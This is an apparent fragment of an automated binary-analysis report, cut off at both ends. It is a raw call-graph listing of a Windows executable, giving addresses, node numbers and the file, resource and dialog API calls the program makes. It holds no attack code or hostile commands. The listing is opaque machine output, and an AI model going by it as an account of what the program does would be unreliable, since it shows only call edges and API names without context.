4 library calls 20958->21037 20961 7ff7c01889cd 20962 7ff7c01889f0 20961->20962 20964 7ff7c0181c80 33 API calls 20961->20964 20963 7ff7c0188a28 20962->20963 20966 7ff7c0188a44 20962->20966 20965 7ff7c01a5c30 _handle_error 8 API calls 20963->20965 20964->20962 20967 7ff7c0188a39 20965->20967 20968 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20966->20968 20967->20865 20969 7ff7c0188a49 20968->20969 20971 7ff7c0188b40 20970->20971 20972 7ff7c0188b57 20971->20972 20973 7ff7c0188b89 20971->20973 20975 7ff7c01812bc 33 API calls 20972->20975 21061 7ff7c018353c 47 API calls 20973->21061 20977 7ff7c0188b7b 20975->20977 20977->20910 20979 7ff7c018678c GetVersionExW 20978->20979 20980 7ff7c01867bf 20978->20980 20979->20980 20981 7ff7c01a5c30 _handle_error 8 API calls 20980->20981 20982 7ff7c01867ec 20981->20982 20982->20910 20984 7ff7c0188dd9 20983->20984 21062 7ff7c0188f28 20984->21062 20986 7ff7c0188dfe 20986->20910 20988 7ff7c01858bb GetFileAttributesW 20987->20988 20989 7ff7c01858b8 20987->20989 20990 7ff7c0185949 20988->20990 20991 7ff7c01858cc 20988->20991 20989->20988 20993 7ff7c01a5c30 _handle_error 8 API calls 20990->20993 21071 7ff7c01880b0 20991->21071 20995 7ff7c018595d 20993->20995 20995->20910 20996 7ff7c01858f7 GetFileAttributesW 20997 7ff7c0185910 20996->20997 20997->20990 20998 7ff7c018596d 20997->20998 20999 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20998->20999 21000 7ff7c0185972 20999->21000 21001->20878 21004 7ff7c018cfca 21002->21004 21003 7ff7c018cffe 21003->20901 21004->21003 21005 7ff7c0181734 33 API calls 21004->21005 21005->21004 21006->20914 21008 7ff7c018aef3 21007->21008 21181 7ff7c0189b74 21008->21181 21011 7ff7c018af86 21014 7ff7c018da04 21011->21014 21012 7ff7c018af58 LoadStringW 21012->21011 21013 7ff7c018af71 LoadStringW 21012->21013 21013->21011 21207 7ff7c018d7e0 21014->21207 21017->20952 21018->20935 21019->20945 21020->20907 21021->20906 21022->20915 21024 7ff7c0182344 21023->21024 21030 7ff7c01823f8 21023->21030 21027 7ff7c01823f3 21024->21027 21028 7ff7c01823a1 21024->21028 21031 7ff7c0182352 BuildCatchObjectHelperInternal 21024->21031 21047 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21027->21047 21028->21031 21038 7ff7c01a5ae0 21028->21038 21048 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21030->21048 21031->20958 21034 7ff7c0181c55 21033->21034 21036 7ff7c0181c29 BuildCatchObjectHelperInternal 21033->21036 21060 7ff7c01815a8 33 API calls 3 library calls 21034->21060 21036->20961 21037->20957 21040 7ff7c01a5aeb 21038->21040 21039 7ff7c01a5b04 21039->21031 21040->21039 21042 7ff7c01a5b0a 21040->21042 21049 7ff7c01af0c8 21040->21049 21043 7ff7c01a5b15 21042->21043 21052 7ff7c01a674c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21042->21052 21053 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21043->21053 21054 7ff7c01af108 21049->21054 21052->21043 21059 7ff7c01b2828 EnterCriticalSection 21054->21059 21060->21036 21063 7ff7c01890c6 21062->21063 21066 7ff7c0188f5a 21062->21066 21070 7ff7c018353c 47 API calls 21063->21070 21068 7ff7c0188f74 BuildCatchObjectHelperInternal 21066->21068 21069 7ff7c0186edc 33 API calls 2 library calls 21066->21069 21068->20986 21069->21068 21072 7ff7c01880ef 21071->21072 21089 7ff7c01880e8 21071->21089 21074 7ff7c01812bc 33 API calls 21072->21074 21073 7ff7c01a5c30 _handle_error 8 API calls 21075 7ff7c01858f3 21073->21075 21076 7ff7c018811a 21074->21076 21075->20996 21075->20997 21077 7ff7c018813a 21076->21077 21078 7ff7c018836b 21076->21078 21080 7ff7c0188154 21077->21080 21102 7ff7c01881ed 21077->21102 21079 7ff7c0187a28 35 API calls 21078->21079 21083 7ff7c018838a 21079->21083 21081 7ff7c018874f 21080->21081 21144 7ff7c0187050 21080->21144 21173 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21081->21173 21082 7ff7c0188593 21085 7ff7c0188773 21082->21085 21091 7ff7c0187050 4 API calls 21082->21091 21083->21082 21086 7ff7c01883bf 21083->21086 21141 7ff7c01881e8 21083->21141 21176 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21085->21176 21092 7ff7c0188761 21086->21092 21099 7ff7c0187050 4 API calls 21086->21099 21087 7ff7c0188755 21100 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21087->21100 21089->21073 21090 7ff7c01881a7 21103 7ff7c0181b70 31 API calls 21090->21103 21110 7ff7c01881b9 BuildCatchObjectHelperInternal 21090->21110 21097 7ff7c01885fa 21091->21097 21174 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21092->21174 21093 7ff7c0188779 21095 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21093->21095 21101 7ff7c018877f 21095->21101 21096 7ff7c018874a 21107 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21096->21107 21171 7ff7c01811ec 33 API calls BuildCatchObjectHelperInternal 21097->21171 21121 7ff7c018841a BuildCatchObjectHelperInternal 21099->21121 21108 7ff7c018875b 21100->21108 21114 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21101->21114 21109 7ff7c01812bc 33 API calls 21102->21109 21102->21141 21103->21110 21105 7ff7c0188767 21117 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21105->21117 21106 7ff7c0181b70 31 API calls 21106->21141 21107->21081 21112 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21108->21112 21115 7ff7c0188262 21109->21115 21110->21106 21111 7ff7c018860d 21172 7ff7c0186d64 33 API calls BuildCatchObjectHelperInternal 21111->21172 21112->21092 21113 7ff7c0181b70 31 API calls 21127 7ff7c0188499 21113->21127 21118 7ff7c0188785 21114->21118 21152 7ff7c0186dd8 21115->21152 21120 7ff7c018876d 21117->21120 21175 7ff7c018353c 47 API calls 21120->21175 21121->21105 21121->21113 21123 7ff7c0181b70 31 API calls 21126 7ff7c0188690 21123->21126 21129 7ff7c0181b70 31 API calls 21126->21129 21132 7ff7c01884c5 21127->21132 21170 7ff7c0181734 33 API calls 4 library calls 21127->21170 21128 7ff7c018861d BuildCatchObjectHelperInternal 21128->21101 21128->21123 21131 7ff7c018869a 21129->21131 21130 7ff7c0181b70 31 API calls 21134 7ff7c0188311 21130->21134 21135 7ff7c0181b70 31 API calls 21131->21135 21132->21120 21136 7ff7c01812bc 33 API calls 21132->21136 21137 7ff7c0181b70 31 API calls 21134->21137 21135->21141 21138 7ff7c0188566 21136->21138 21137->21141 21140 7ff7c0181c04 33 API calls 21138->21140 21139 7ff7c018828d BuildCatchObjectHelperInternal 21139->21108 21139->21130 21142 7ff7c0188583 21140->21142 21141->21087 21141->21089 21141->21093 21141->21096 21143 7ff7c0181b70 31 API calls 21142->21143 21143->21141 21145 7ff7c018709d 21144->21145 21150 7ff7c01870b2 BuildCatchObjectHelperInternal 21144->21150 21146 7ff7c018715d 21145->21146 21147 7ff7c01870e4 21145->21147 21145->21150 21177 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21146->21177 21147->21150 21151 7ff7c01a5ae0 4 API calls 21147->21151 21150->21090 21151->21150 21153 7ff7c0186e01 21152->21153 21154 7ff7c0186e56 21153->21154 21155 7ff7c0186e13 21153->21155 21178 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21154->21178 21158 7ff7c0187050 4 API calls 21155->21158 21159 7ff7c0186e3e 21158->21159 21160 7ff7c01852c0 21159->21160 21161 7ff7c018530e 21160->21161 21162 7ff7c01854a1 21161->21162 21164 7ff7c018549c 21161->21164 21165 7ff7c0185418 21161->21165 21169 7ff7c0185314 BuildCatchObjectHelperInternal 21161->21169 21180 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21162->21180 21179 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21164->21179 21168 7ff7c01a5ae0 4 API calls 21165->21168 21165->21169 21168->21169 21169->21139 21170->21132 21171->21111 21172->21128 21188 7ff7c0189a38 21181->21188 21184 7ff7c0189bd9 21186 7ff7c01a5c30 _handle_error 8 API calls 21184->21186 21187 7ff7c0189bf2 21186->21187 21187->21011 21187->21012 21189 7ff7c0189a92 21188->21189 21197 7ff7c0189b30 21188->21197 21192 7ff7c0189ac0 21189->21192 21202 7ff7c0190688 WideCharToMultiByte 21189->21202 21190 7ff7c01a5c30 _handle_error 8 API calls 21193 7ff7c0189b64 21190->21193 21194 7ff7c0189aef 21192->21194 21204 7ff7c018ae88 45 API calls 2 library calls 21192->21204 21193->21184 21198 7ff7c0189c00 21193->21198 21205 7ff7c01ad62c 31 API calls 2 library calls 21194->21205 21197->21190 21199 7ff7c0189c40 21198->21199 21201 7ff7c0189c69 21198->21201 21206 7ff7c01ad62c 31 API calls 2 library calls 21199->21206 21201->21184 21203 7ff7c01906ca 21202->21203 21203->21192 21204->21194 21205->21197 21206->21201 21223 7ff7c018d43c 21207->21223 21211 7ff7c018d851 swprintf 21219 7ff7c018d8e0 21211->21219 21237 7ff7c01ad348 21211->21237 21264 7ff7c0183550 33 API calls 21211->21264 21213 7ff7c018d90f 21215 7ff7c018d983 21213->21215 21218 7ff7c018d9ab 21213->21218 21216 7ff7c01a5c30 _handle_error 8 API calls 21215->21216 21217 7ff7c018d997 21216->21217 21217->20949 21220 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21218->21220 21219->21213 21265 7ff7c0183550 33 API calls 21219->21265 21221 7ff7c018d9b0 21220->21221 21224 7ff7c018d5d1 21223->21224 21225 7ff7c018d46e 21223->21225 21227 7ff7c018ca1c 21224->21227 21225->21224 21226 7ff7c0181734 33 API calls 21225->21226 21226->21225 21228 7ff7c018ca52 21227->21228 21235 7ff7c018cb1c 21227->21235 21231 7ff7c018cb17 21228->21231 21232 7ff7c018cabc 21228->21232 21233 7ff7c018ca62 21228->21233 21266 7ff7c0181b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21231->21266 21232->21233 21236 7ff7c01a5ae0 4 API calls 21232->21236 21233->21211 21267 7ff7c0181bd4 33 API calls std::_Xinvalid_argument 21235->21267 21236->21233 21238 7ff7c01ad3a6 21237->21238 21239 7ff7c01ad38e 21237->21239 21238->21239 21241 7ff7c01ad3b0 21238->21241 21268 7ff7c01b0bac 15 API calls _set_fmode 21239->21268 21270 7ff7c01ab348 35 API calls 2 library calls 21241->21270 21242 7ff7c01ad393 21269 7ff7c01aae74 31 API calls _invalid_parameter_noinfo_noreturn 21242->21269 21245 7ff7c01a5c30 _handle_error 8 API calls 21247 7ff7c01ad563 21245->21247 21246 7ff7c01ad3c1 memcpy_s 21271 7ff7c01ab2c8 15 API calls _set_fmode 21246->21271 21247->21211 21249 7ff7c01ad42c 21272 7ff7c01ab750 46 API calls 3 library calls 21249->21272 21251 7ff7c01ad435 21252 7ff7c01ad43d 21251->21252 21253 7ff7c01ad46c 21251->21253 21273 7ff7c01b0e1c 21252->21273 21255 7ff7c01ad4c4 21253->21255 21256 7ff7c01ad4ea 21253->21256 21257 7ff7c01ad47b 21253->21257 21258 7ff7c01ad472 21253->21258 21259 7ff7c01b0e1c __free_lconv_num 15 API calls 21255->21259 21256->21255 21260 7ff7c01ad4f4 21256->21260 21261 7ff7c01b0e1c __free_lconv_num 15 API calls 21257->21261 21258->21255 21258->21257 21263 7ff7c01ad39e 21259->21263 21262 7ff7c01b0e1c __free_lconv_num 15 API calls 21260->21262 21261->21263 21262->21263 21263->21245 21264->21211 21265->21213 21268->21242 21269->21263 21270->21246 21271->21249 21272->21251 21274 7ff7c01b0e21 RtlRestoreThreadPreferredUILanguages 21273->21274 21278 7ff7c01b0e51 __free_lconv_num 21273->21278 21275 7ff7c01b0e3c 21274->21275 21274->21278 21279 7ff7c01b0bac 15 API calls _set_fmode 21275->21279 21277 7ff7c01b0e41 GetLastError 21277->21278 21278->21263 21279->21277 21282->20719 21286 7ff7c019c28b SizeofResource 21285->21286 21287 7ff7c019c3d7 21285->21287 21286->21287 21288 7ff7c019c2a5 LoadResource 21286->21288 21287->20755 21288->21287 21289 7ff7c019c2be LockResource 21288->21289 21289->21287 21290 7ff7c019c2d3 GlobalAlloc 21289->21290 21290->21287 21291 7ff7c019c2f4 GlobalLock 21290->21291 21292 7ff7c019c3ce GlobalFree 21291->21292 21294 7ff7c019c306 BuildCatchObjectHelperInternal 21291->21294 21292->21287 21293 7ff7c019c3c5 GlobalUnlock 21293->21292 21294->21293 21295 7ff7c019c3ae 21294->21295 21296 7ff7c019c396 GdipCreateHBITMAPFromBitmap 21294->21296 21295->21293 21296->21295 21298 7ff7c019c15c 4 API calls 21297->21298 21299 7ff7c019c13a 21298->21299 21300 7ff7c019c149 21299->21300 21308 7ff7c019c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21299->21308 21300->20762 21300->20763 21300->20764 21302->20767 21304 7ff7c019c173 21303->21304 21305 7ff7c019c16e 21303->21305 21307 7ff7c019ca30 16 API calls _handle_error 21304->21307 21309 7ff7c019c1cc GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21305->21309 21307->20772 21308->21300 21309->21304 21313 7ff7c0189cfe _snwprintf 21310->21313 21311 7ff7c0189d73 21428 7ff7c018806c 48 API calls 21311->21428 21313->21311 21315 7ff7c0189e89 21313->21315 21314 7ff7c0181b70 31 API calls 21317 7ff7c0189dfd 21314->21317 21315->21317 21319 7ff7c0181c80 33 API calls 21315->21319 21316 7ff7c0189d7d BuildCatchObjectHelperInternal 21316->21314 21373 7ff7c018a82e 21316->21373 21379 7ff7c01846a0 21317->21379 21318 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21320 7ff7c018a834 21318->21320 21319->21317 21323 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21320->21323 21327 7ff7c018a83a 21323->21327 21324 7ff7c0189e22 21325 7ff7c018424c 100 API calls 21324->21325 21328 7ff7c0189e2b 21325->21328 21326 7ff7c0189f17 21397 7ff7c01ad800 21326->21397 21328->21320 21330 7ff7c0189e66 21328->21330 21334 7ff7c01a5c30 _handle_error 8 API calls 21330->21334 21331 7ff7c0189ead 21331->21326 21335 7ff7c0189254 33 API calls 21331->21335 21333 7ff7c01ad800 31 API calls 21347 7ff7c0189f57 __vcrt_InitializeCriticalSectionEx 21333->21347 21336 7ff7c018a80e 21334->21336 21335->21331 21336->20775 21337 7ff7c018a089 21339 7ff7c0184c40 101 API calls 21337->21339 21367 7ff7c018a15c 21337->21367 21341 7ff7c018a0a1 21339->21341 21342 7ff7c0184a70 104 API calls 21341->21342 21341->21367 21345 7ff7c018a0c9 21342->21345 21345->21367 21375 7ff7c018a0d7 __vcrt_InitializeCriticalSectionEx 21345->21375 21429 7ff7c019033c MultiByteToWideChar 21345->21429 21347->21337 21347->21367 21405 7ff7c0184d50 21347->21405 21414 7ff7c0184a70 21347->21414 21419 7ff7c0184c40 21347->21419 21350 7ff7c018a5ec 21366 7ff7c018a6c2 21350->21366 21435 7ff7c01b0498 31 API calls 2 library calls 21350->21435 21352 7ff7c018a557 21352->21350 21432 7ff7c01b0498 31 API calls 2 library calls 21352->21432 21354 7ff7c018a54b 21354->20775 21356 7ff7c018a6ae 21356->21366 21437 7ff7c01890cc 33 API calls Concurrency::cancel_current_task 21356->21437 21357 7ff7c018a7a2 21359 7ff7c01ad800 31 API calls 21357->21359 21358 7ff7c018a649 21436 7ff7c01aecc4 31 API calls _invalid_parameter_noinfo_noreturn 21358->21436 21361 7ff7c018a7cb 21359->21361 21364 7ff7c01ad800 31 API calls 21361->21364 21362 7ff7c0189254 33 API calls 21362->21366 21363 7ff7c018a56d 21433 7ff7c01aecc4 31 API calls _invalid_parameter_noinfo_noreturn 21363->21433 21364->21367 21366->21357 21366->21362 21424 7ff7c018424c 21367->21424 21368 7ff7c018a5d8 21368->21350 21434 7ff7c01890cc 33 API calls Concurrency::cancel_current_task 21368->21434 21370 7ff7c018a829 21438 7ff7c01a5df4 8 API calls 21370->21438 21372 7ff7c0190688 WideCharToMultiByte 21372->21375 21373->21318 21375->21350 21375->21352 21375->21354 21375->21367 21375->21370 21375->21372 21430 7ff7c018ae88 45 API calls 2 library calls 21375->21430 21431 7ff7c01ad62c 31 API calls 2 library calls 21375->21431 21378 7ff7c018a868 21377->21378 21378->20777 21380 7ff7c01846dd CreateFileW 21379->21380 21382 7ff7c018478e GetLastError 21380->21382 21390 7ff7c018484e 21380->21390 21383 7ff7c01880b0 49 API calls 21382->21383 21384 7ff7c01847bc 21383->21384 21385 7ff7c01847c0 CreateFileW GetLastError 21384->21385 21391 7ff7c018480c 21384->21391 21385->21391 21386 7ff7c0184891 SetFileTime 21389 7ff7c01848af 21386->21389 21387 7ff7c01848e8 21388 7ff7c01a5c30 _handle_error 8 API calls 21387->21388 21392 7ff7c01848fb 21388->21392 21389->21387 21393 7ff7c0181c80 33 API calls 21389->21393 21390->21386 21390->21389 21391->21390 21394 7ff7c0184916 21391->21394 21392->21324 21392->21331 21393->21387 21395 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21394->21395 21396 7ff7c018491b 21395->21396 21398 7ff7c01ad82d 21397->21398 21404 7ff7c01ad842 21398->21404 21439 7ff7c01b0bac 15 API calls _set_fmode 21398->21439 21400 7ff7c01ad837 21440 7ff7c01aae74 31 API calls _invalid_parameter_noinfo_noreturn 21400->21440 21401 7ff7c01a5c30 _handle_error 8 API calls 21403 7ff7c0189f37 21401->21403 21403->21333 21404->21401 21406 7ff7c0184d6d 21405->21406 21407 7ff7c0184d89 21405->21407 21408 7ff7c0184d9b 21406->21408 21441 7ff7c0183eac 99 API calls _com_raise_error 21406->21441 21407->21408 21409 7ff7c0184da1 SetFilePointer 21407->21409 21408->21347 21409->21408 21411 7ff7c0184dbe GetLastError 21409->21411 21411->21408 21412 7ff7c0184dc8 21411->21412 21412->21408 21442 7ff7c0183eac 99 API calls _com_raise_error 21412->21442 21415 7ff7c0184a9d 21414->21415 21417 7ff7c0184a96 21414->21417 21416 7ff7c0184520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21415->21416 21415->21417 21443 7ff7c0183d8c 99 API calls _com_raise_error 21415->21443 21416->21415 21417->21347 21444 7ff7c018491c 21419->21444 21422 7ff7c0184c67 21422->21347 21425 7ff7c0184266 21424->21425 21426 7ff7c0184272 21424->21426 21425->21426 21452 7ff7c01842d0 21425->21452 21428->21316 21429->21375 21430->21375 21431->21375 21432->21363 21433->21368 21434->21350 21435->21358 21436->21356 21437->21366 21438->21373 21439->21400 21440->21404 21450 7ff7c018492d _snwprintf 21444->21450 21445 7ff7c0184959 21447 7ff7c01a5c30 _handle_error 8 API calls 21445->21447 21446 7ff7c0184a34 SetFilePointer 21446->21445 21448 7ff7c0184a5c GetLastError 21446->21448 21449 7ff7c01849c1 21447->21449 21448->21445 21449->21422 21451 7ff7c0183eac 99 API calls _com_raise_error 21449->21451 21450->21445 21450->21446 21453 7ff7c01842ea 21452->21453 21454 7ff7c0184302 21452->21454 21453->21454 21456 7ff7c01842f6 FindCloseChangeNotification 21453->21456 21455 7ff7c0184326 21454->21455 21458 7ff7c0183a64 99 API calls 21454->21458 21455->21426 21456->21454 21458->21455 21460 7ff7c0188d03 21459->21460 21461 7ff7c0188d06 SetCurrentDirectoryW 21459->21461 21460->21461 21461->20792 21462->20783 21463->20802 21464->20809 21466->20827 21470 7ff7c01a4d50 21471 7ff7c01a4c83 21470->21471 21472 7ff7c01a5390 _com_raise_error 14 API calls 21471->21472 21473 7ff7c01a4cc2 21472->21473 21481 7ff7c0199c49 8 API calls _handle_error 22706 7ff7c0190120 22707 7ff7c01a3c98 22706->22707 22708 7ff7c01a3d4f 22707->22708 22709 7ff7c01a3cd7 22707->22709 22711 7ff7c018aee0 48 API calls 22708->22711 22710 7ff7c018aee0 48 API calls 22709->22710 22712 7ff7c01a3ceb 22710->22712 22713 7ff7c01a3d63 22711->22713 22714 7ff7c018da04 48 API calls 22712->22714 22715 7ff7c018da04 48 API calls 22713->22715 22718 7ff7c01a3cfa BuildCatchObjectHelperInternal 22714->22718 22715->22718 22716 7ff7c0181b70 31 API calls 22717 7ff7c01a3df9 22716->22717 22719 7ff7c018210c SetDlgItemTextW 22717->22719 22718->22716 22723 7ff7c01a3e84 22718->22723 22731 7ff7c01a3e7e 22718->22731 22722 7ff7c01a3e0e SetDlgItemTextW 22719->22722 22720 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22720->22723 22721 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22724 7ff7c01a3e8a 22721->22724 22725 7ff7c01a3e27 22722->22725 22726 7ff7c01a3e54 22722->22726 22723->22721 22725->22726 22729 7ff7c01a3e79 22725->22729 22727 7ff7c01a5c30 _handle_error 8 API calls 22726->22727 22728 7ff7c01a3e67 22727->22728 22730 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22729->22730 22730->22731 22731->22720 22946 7ff7c01a4f32 22947 7ff7c01a5390 _com_raise_error 14 API calls 22946->22947 22948 7ff7c01a4f71 22947->22948 22949 7ff7c01b9b30 22950 7ff7c01b9b4e 22949->22950 22951 7ff7c01a7848 _com_raise_error 2 API calls 22950->22951 22952 7ff7c01b9b57 22951->22952 22965 7ff7c0190d80 31 API calls 22952->22965 22954 7ff7c01b9b7c 22955 7ff7c01a7848 _com_raise_error 2 API calls 22954->22955 22956 7ff7c01b9b9c 22955->22956 22966 7ff7c0190db4 31 API calls 22956->22966 22958 7ff7c01b9bbb 22967 7ff7c01922e8 22958->22967 22965->22954 22966->22958 22968 7ff7c01922ff 22967->22968 22969 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22968->22969 22970 7ff7c0192328 22969->22970 22971 7ff7c01812bc 33 API calls 22970->22971 22972 7ff7c01923ff 22971->22972 22973 7ff7c0190114 83 API calls 22972->22973 22974 7ff7c0192413 22973->22974 22975 7ff7c0181b70 31 API calls 22974->22975 22976 7ff7c019241d 22975->22976 22977 7ff7c01a5ae0 4 API calls 22976->22977 22978 7ff7c0192481 22977->22978 22983 7ff7c01912cc 31 API calls 22978->22983 22980 7ff7c0193d9a 22984 7ff7c0191a70 31 API calls _invalid_parameter_noinfo_noreturn 22980->22984 22982 7ff7c0193db2 22983->22980 22984->22982 22733 7ff7c0193e60 22734 7ff7c0193ec2 22733->22734 22735 7ff7c0193f05 22733->22735 22782 7ff7c0194ee4 22734->22782 22738 7ff7c0193fb4 22735->22738 22781 7ff7c0184c40 101 API calls 22735->22781 22740 7ff7c0193fe0 22738->22740 22771 7ff7c0194049 22738->22771 22739 7ff7c018552c 56 API calls 22741 7ff7c0193edd 22739->22741 22742 7ff7c0194023 22740->22742 22745 7ff7c0193fea 22740->22745 22744 7ff7c0194ee4 59 API calls 22741->22744 22799 7ff7c0195b60 22742->22799 22743 7ff7c0193f8c 22798 7ff7c0184e00 SetEndOfFile 22743->22798 22747 7ff7c0193ee2 22744->22747 22817 7ff7c0184160 82 API calls 22745->22817 22747->22735 22751 7ff7c0193ee6 22747->22751 22750 7ff7c0193f98 22780 7ff7c0184c40 101 API calls 22750->22780 22816 7ff7c0183a9c 99 API calls 22751->22816 22754 7ff7c019412c 22755 7ff7c0194031 22754->22755 22757 7ff7c0194d74 104 API calls 22754->22757 22761 7ff7c0194168 22755->22761 22834 7ff7c0183c7c 82 API calls 22755->22834 22756 7ff7c0194000 22760 7ff7c0194940 53 API calls 22756->22760 22774 7ff7c0193efc 22756->22774 22757->22755 22758 7ff7c01a5c30 _handle_error 8 API calls 22759 7ff7c01942f0 22758->22759 22763 7ff7c0194013 22760->22763 22779 7ff7c01941fd 22761->22779 22835 7ff7c0198db4 8 API calls 22761->22835 22766 7ff7c0185790 51 API calls 22763->22766 22766->22774 22767 7ff7c01942c1 22769 7ff7c01942cf 22767->22769 22810 7ff7c0194940 22767->22810 22768 7ff7c0194244 22768->22767 22768->22769 22837 7ff7c0184e00 SetEndOfFile 22768->22837 22769->22774 22775 7ff7c0185790 51 API calls 22769->22775 22771->22754 22818 7ff7c019511c 22771->22818 22827 7ff7c01900f0 22771->22827 22830 7ff7c0194d74 22771->22830 22774->22758 22775->22774 22777 7ff7c019418e 22778 7ff7c019511c 120 API calls 22777->22778 22777->22779 22778->22777 22779->22768 22836 7ff7c01838e0 82 API calls 2 library calls 22779->22836 22780->22738 22781->22743 22783 7ff7c0186288 55 API calls 22782->22783 22784 7ff7c0194f42 22783->22784 22785 7ff7c0194f5b 22784->22785 22787 7ff7c0194f53 22784->22787 22786 7ff7c01a5ae0 4 API calls 22785->22786 22789 7ff7c0194f65 22786->22789 22838 7ff7c0185db0 51 API calls 2 library calls 22787->22838 22790 7ff7c0184334 51 API calls 22789->22790 22792 7ff7c0194f94 22790->22792 22791 7ff7c0194ffb 22793 7ff7c01a5c30 _handle_error 8 API calls 22791->22793 22792->22791 22794 7ff7c0195023 22792->22794 22795 7ff7c0193ec7 22793->22795 22796 7ff7c01aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22794->22796 22795->22735 22795->22739 22797 7ff7c0195028 22796->22797 22798->22750 22804 7ff7c0195b99 22799->22804 22800 7ff7c019511c 120 API calls 22800->22804 22804->22800 22805 7ff7c01900f0 SendDlgItemMessageW 22804->22805 22806 7ff7c0195d91 22804->22806 22807 7ff7c0195e0e 22804->22807 22809 7ff7c0184d50 101 API calls 22804->22809 22839 7ff7c0196294 22804->22839 22861 7ff7c0196b60 22804->22861 22870 7ff7c019699c 125 API calls _handle_error 22804->22870 22805->22804 22806->22807 22808 7ff7c0194d74 104 API calls 22806->22808 22807->22755 22808->22807 22809->22804 22811 7ff7c019495a 22810->22811 22814 7ff7c019499e 22810->22814 22880 7ff7c0184c70 22811->22880 22813 7ff7c0194a2d 22813->22769 22814->22813 22815 7ff7c0185ff4 51 API calls 22814->22815 22815->22813 22816->22774 22817->22756 22819 7ff7c0195137 22818->22819 22824 7ff7c019512f 22818->22824 22820 7ff7c01953bc 120 API calls 22819->22820 22822 7ff7c019518a 22819->22822 22819->22824 22821 7ff7c0195176 22820->22821 22821->22822 22821->22824 22825 7ff7c01951e1 22821->22825 22822->22824 22885 7ff7c0198d6c 8 API calls 22822->22885 22824->22771 22886 7ff7c0183df0 99 API calls 2 library calls 22825->22886 22827->22771 22828 7ff7c01a3a80 22827->22828 22829 7ff7c01a3a8f SendDlgItemMessageW 22828->22829 22832 7ff7c0194dad 22830->22832 22831 7ff7c0194dd3 22831->22771 22832->22831 22887 7ff7c0184e18 22832->22887 22834->22761 22835->22777 22836->22768 22837->22767 22838->22785 22841 7ff7c01962eb memcpy_s 22839->22841 22840 7ff7c019511c 120 API calls 22840->22841 22841->22840 22843 7ff7c019633d 22841->22843 22842 7ff7c019511c 120 API calls 22842->22843 22843->22842 22845 7ff7c019639f 22843->22845 22854 7ff7c019650a 22843->22854 22844 7ff7c01a5c30 _handle_error 8 API calls 22847 7ff7c019697b 22844->22847 22846 7ff7c019511c 120 API calls 22845->22846 22849 7ff7c01963f8 22845->22849 22845->22854 22846->22845 22847->22804 22848 7ff7c01964a2 22871 7ff7c019569c 22848->22871 22849->22848 22851 7ff7c019511c 120 API calls 22849->22851 22849->22854 22851->22849 22852 7ff7c019674c 22853 7ff7c019569c 8 API calls 22852->22853 22855 7ff7c01967c0 22853->22855 22854->22844 22855->22854 22858 7ff7c019569c 8 API calls 22855->22858 22856 7ff7c0196500 22856->22852 22856->22854 22857 7ff7c019511c 120 API calls 22856->22857 22857->22856 22859 7ff7c0196896 22858->22859 22859->22854 22875 7ff7c0195e44 22859->22875 22865 7ff7c0196ba8 22861->22865 22862 7ff7c0196c2d 22866 7ff7c0196bee 22862->22866 22868 7ff7c019511c 120 API calls 22862->22868 22869 7ff7c0194d74 104 API calls 22862->22869 22863 7ff7c019511c 120 API calls 22863->22865 22864 7ff7c0196bdf 22864->22862 22864->22866 22867 7ff7c019511c 120 API calls 22864->22867 22865->22863 22865->22864 22866->22804 22867->22864 22868->22862 22869->22862 22870->22804 22874 7ff7c01956fe memcpy_s 22871->22874 22872 7ff7c01a5c30 _handle_error 8 API calls 22873 7ff7c0195ae9 22872->22873 22873->22856 22874->22872 22878 7ff7c0195ea7 22875->22878 22876 7ff7c0196260 22876->22854 22877 7ff7c019511c 120 API calls 22877->22878 22878->22876 22878->22877 22879 7ff7c0194d74 104 API calls 22878->22879 22879->22878 22881 7ff7c0184c94 22880->22881 22883 7ff7c0184ca4 22880->22883 22882 7ff7c0184c9a FlushFileBuffers 22881->22882 22881->22883 22882->22883 22884 7ff7c0184d0e SetFileTime 22883->22884 22884->22814 22886->22824 22888 7ff7c0184e4b 22887->22888 22889 7ff7c0184e44 22887->22889 22890 7ff7c0184e55 GetStdHandle 22888->22890 22895 7ff7c0184e63 22888->22895 22891 7ff7c01a5c30 _handle_error 8 API calls 22889->22891 22890->22895 22892 7ff7c0184fee 22891->22892 22892->22831 22893 7ff7c0184ebe WriteFile 22893->22895 22894 7ff7c0184e7e WriteFile 22894->22895 22896 7ff7c0184eb4 22894->22896 22895->22889 22895->22893 22895->22894 22898 7ff7c0184f56 22895->22898 22906 7ff7c0183a18 101 API calls 22895->22906 22896->22894 22896->22895 22899 7ff7c01812bc 